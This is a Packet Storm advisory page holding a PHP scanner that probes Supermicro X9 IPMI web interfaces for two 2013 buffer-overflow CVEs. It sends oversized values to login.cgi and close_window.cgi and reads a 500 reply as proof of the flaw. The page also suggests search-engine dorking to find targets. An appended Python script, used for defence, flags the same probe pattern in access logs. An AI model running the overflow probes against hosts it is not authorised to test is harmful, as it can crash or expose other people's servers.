
Supermicro X9 Buffer Overflow Scanner

06 Mar 2025 00:00:00 | Reported by: indoushka | Type: packetstorm | Source: packetstorm.news | 623 views

Supermicro X9 vulnerability scanner detects buffer overflow in IPMI systems for specific CVEs.

=============================================================================================================================================
    | # Title     : Supermicro X9 generation motherboards before SMT X9 317 PHP Vulnerability Scanner                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.supermicro.com                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: This code is a vulnerability scanner for the Supermicro onboard IPMI interface. It checks for two known vulnerabilities in Supermicro IPMI systems:
    
        CVE-2013-3621 - Buffer overflow in login.cgi. The code sends a normal-sized login request, then one carrying much larger data.
    
        If the server responds with a 500 (Internal Server Error) when sent the large data, the system is vulnerable.
    
        CVE-2013-3623 - Buffer overflow in close_window.cgi. The code sends a request to close_window.cgi with normal data, then one with very large data.
    
        If the server responds with a 500 when sent the large data, the system is vulnerable.
    
        How does the code work?
    
        Verifies that the target site is a Supermicro IPMI by checking the text on the home page (isSupermicro).
    
        Checks the login.cgi vulnerability by sending random login data (checkLogin).
    
        Checks the close_window.cgi vulnerability by sending session data (checkCloseWindow).
    
        Displays the results: If the target is vulnerable, a warning message will be printed.
    
        What is this code for?
    
        Helps security researchers discover systems affected by these vulnerabilities.
    
        Can be used in penetration testing to verify the security of Supermicro IPMI devices.
    	
        Administrators can use it to verify that their systems are not affected by these vulnerabilities.
    	
    	
    	( Related : https://packetstorm.news/files/id/181154/  Related CVE Numbers: CVE-2013-3621, CVE-2013-3623 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 92
    
    [+] Usage : php poc.php 
    
    [+] Payload :
    
    <?php
    
    class SupermicroIPMIScanner {
        private $target;
        
        public function __construct($target) {
            $this->target = $target;
        }
        
        private function sendRequest($uri, $method = 'GET', $postData = []) {
            $url = "http://{$this->target}{$uri}";
            
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            
            if ($method === 'POST') {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
            }
            
            $response = curl_exec($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            return ['body' => $response, 'code' => $httpCode];
        }
        
        private function isSupermicro() {
            $res = $this->sendRequest("/");
            return ($res['code'] === 200 && strpos($res['body'], "ATEN International Co Ltd.") !== false);
        }
        
        private function sendCloseWindowRequest($session) {
            return $this->sendRequest("/cgi/close_window.cgi", 'POST', ['sess_sid' => $session]);
        }
        
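        private function checkCloseWindow() {
            // Baseline session ID (20 bytes) and oversized session ID (132 bytes).
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 132);
            
            // The baseline must get the normal "Can't find action" reply; otherwise the check is skipped.
            $res = $this->sendCloseWindowRequest($safeCheck);
            if (!$res || $res['code'] !== 200 || strpos($res['body'], "Can't find action") === false) {
                return false;
            }
            
            // A 500 on the oversized value is treated as the sign of the overflow.
            $res = $this->sendCloseWindowRequest($triggerCheck);
            return ($res && $res['code'] === 500);
        }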
        
        private function sendLoginRequest($name) {
            return $this->sendRequest("/cgi/login.cgi", 'POST', [
                'name' => $name,
                'pwd' => str_repeat('A', 4)
            ]);
        }
        
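        private function checkLogin() {
            // Baseline user name (20 bytes) and oversized user name (300 bytes).
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 300);
            
            // The baseline must return the normal login page; otherwise the check is skipped.
            $res = $this->sendLoginRequest($safeCheck);
            if (!$res || $res['code'] !== 200 || strpos($res['body'], "ATEN International Co Ltd.") === false || strpos($res['body'], "top.location.href = location.href") === false) {
                return false;
            }
            
            // A 500 on the oversized value is treated as the sign of the overflow.
            $res = $this->sendLoginRequest($triggerCheck);
            return ($res && $res['code'] === 500);
        }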
        
        public function runScan() {
            echo "Checking if it's a Supermicro IPMI web interface...\n";
            if ($this->isSupermicro()) {
                echo "Supermicro IPMI web interface found\n";
            } else {
                echo "Supermicro IPMI web interface not found\n";
                return;
            }
            
            echo "Checking CVE-2013-3621 (login.cgi Buffer Overflow)...\n";
            if ($this->checkLogin()) {
                echo "Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)\n";
            }
            
            echo "Checking CVE-2013-3623 (close_window.cgi Buffer Overflow)...\n";
            if ($this->checkCloseWindow()) {
                echo "Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)\n";
            }
        }
    }
    
    $scanner = new SupermicroIPMIScanner('192.168.1.1'); // Replace with the target address
    $scanner->runScan();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
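
The two-step probe described above (a small POST answered 200, then an oversized POST to the same CGI answered 500) leaves a recognisable trace in access logs. The following is an added example, not part of the original advisory or the author's code: it flags that pair in logs from a reverse proxy placed in front of the BMC. The log layout, the 60-second window and the 3x size ratio are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Endpoints probed by the scanner, mapped to the CVE each probe tests for.
PROBED = {"/cgi/login.cgi": "CVE-2013-3621",
          "/cgi/close_window.cgi": "CVE-2013-3623"}

# Assumed log layout: client [ISO time] "METHOD path" status request_body_bytes
LINE = re.compile(r'(\S+) \[([^\]]+)\] "(\S+) (\S+)" (\d{3}) (\d+)')

# Constructed sample lines, not captured from a real device.
SAMPLE_LOG = """\
10.0.0.5 [2025-03-06T10:00:00] "GET /" 200 0
10.0.0.5 [2025-03-06T10:00:01] "POST /cgi/login.cgi" 200 34
10.0.0.5 [2025-03-06T10:00:02] "POST /cgi/login.cgi" 500 314
10.0.0.5 [2025-03-06T10:00:03] "POST /cgi/close_window.cgi" 200 29
10.0.0.5 [2025-03-06T10:00:04] "POST /cgi/close_window.cgi" 200 141
10.0.0.9 [2025-03-06T10:05:00] "POST /cgi/login.cgi" 200 31
10.0.0.9 [2025-03-06T11:30:00] "POST /cgi/login.cgi" 500 33
"""

def find_probe_pairs(log_text, window=timedelta(seconds=60), growth=3):
    """Return (client, path, cve) where a small POST answered 200 is followed
    within `window` by a POST at least `growth` times larger answered 500."""
    last_ok = {}   # (client, path) -> (time, body size) of the last 200 reply
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        client, ts, method, path, status, size = m.groups()
        if method != "POST" or path not in PROBED:
            continue
        when, size, key = datetime.fromisoformat(ts), int(size), (client, path)
        if status == "200":
            last_ok[key] = (when, size)
        elif status == "500" and key in last_ok:
            ok_time, ok_size = last_ok[key]
            if when - ok_time <= window and size >= growth * ok_size:
                findings.append((client, path, PROBED[path]))
    return findings

if __name__ == "__main__":
    for client, path, cve in find_probe_pairs(SAMPLE_LOG):
        print(f"{client}: {path} returned 500 to an oversized POST ({cve} pattern)")
```

A hit means both that someone ran this kind of check and that the device answered the way the advisory says a vulnerable one does, so it is a reason to prioritise that BMC for a firmware update and network isolation.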


Vulners AI Score: 7.7 (High risk) | CVSS 2: 10 | EPSS: 0.8637